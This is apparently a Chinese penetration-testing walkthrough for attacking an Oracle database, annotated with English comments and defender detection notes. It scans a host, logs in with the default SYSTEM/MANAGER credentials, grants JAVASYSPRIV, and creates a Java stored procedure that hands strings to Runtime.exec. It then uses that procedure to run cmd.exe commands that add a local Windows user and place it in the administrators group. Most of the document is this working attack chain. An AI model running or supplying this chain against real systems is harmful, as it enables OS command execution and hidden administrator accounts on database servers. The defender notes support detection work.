一、oracle数据库扫描软件(oscanner)
1.安装oscanner(linux)
apt-get install oscanner
2.运行oscanner
oscanner -s 192.168.56.9 -P 1521
二、使用 sqlplus 远程连接 Oracle 数据库(示例中的 SYSTEM/MANAGER 是 Oracle 的默认账号口令;防护上应在安装后修改或锁定默认账号)
sqlplus.exe SYSTEM/MANAGER@192.168.56.9:1521/ora8
三、渗透测试(已具备 DBA 权限的情况下)
1.首先授予 SYSTEM 用户 Java 系统权限(JAVASYSPRIV 角色)
-- Grants the JAVASYSPRIV role to the SYSTEM account; the page presents this as
-- the step that enables the Java permissions used by the statements that follow.
-- Defender note: review who holds JAVASYSPRIV (e.g. via DBA_ROLE_PRIVS) and audit
-- role grants; a new grant of this role outside a known change deserves
-- investigation.
grant javasyspriv to SYSTEM;
2.新建Java.sql,内容为:
-- Defines and compiles a Java source object named "JAVACMD" inside the database.
-- Its only method, the static execCommand, hands the supplied string to
-- Runtime.getRuntime().exec(), i.e. it starts an operating-system process.
-- The returned Process object is discarded, so exit status and output are not read.
-- Defender note: inventory Java source/class objects (DBA_OBJECTS lists the
-- JAVA SOURCE and JAVA CLASS object types) and audit CREATE JAVA DDL; stored Java
-- that calls Runtime.exec is rarely needed by applications.
-- NOTE(review): presumably the process runs under the OS account of the
-- database server - confirm for the deployment in question.
CREATE OR REPLACE AND RESOLVE Java SOURCE NAMED "JAVACMD" AS
import java.lang.*;
import java.io.*;
public class JAVACMD
{
public static void execCommand (String command) throws IOException
{
Runtime.getRuntime().exec(command);
}
};
/
-- Call specification: publishes the Java method JAVACMD.execCommand(String) as
-- the PL/SQL procedure JAVACMDPROC, so p_command is handed to that method as
-- its command string.
-- Defender note: the procedure stays in the schema until it is dropped. During
-- review or incident response, look for unexpected procedures declared
-- AS LANGUAGE JAVA and check which accounts hold EXECUTE on them.
CREATE OR REPLACE PROCEDURE JAVACMDPROC (p_command IN VARCHAR2)
AS LANGUAGE JAVA
NAME 'JAVACMD.execCommand (java.lang.String)';
/
3.通过存储过程执行操作系统命令(cmd)
-- Calls JAVACMDPROC twice through the SQL*Plus "exec" command. The command
-- strings create a local Windows account (net user ... /add) and then add it to
-- the local administrators group (net localgroup administrators ... /add).
-- Detection: on Windows hosts these actions are normally recorded as Security
-- events 4720 (user account created) and 4732 (member added to a local group).
-- cmd.exe or net.exe started as a child of the Oracle server process is a strong
-- signal when process-creation logging (event 4688 or Sysmon) is enabled.
exec javacmdproc('cmd.exe /c net user xiaozi 123 /add');
exec javacmdproc('cmd.exe /c net localgroup administrators xiaozi /add');
等等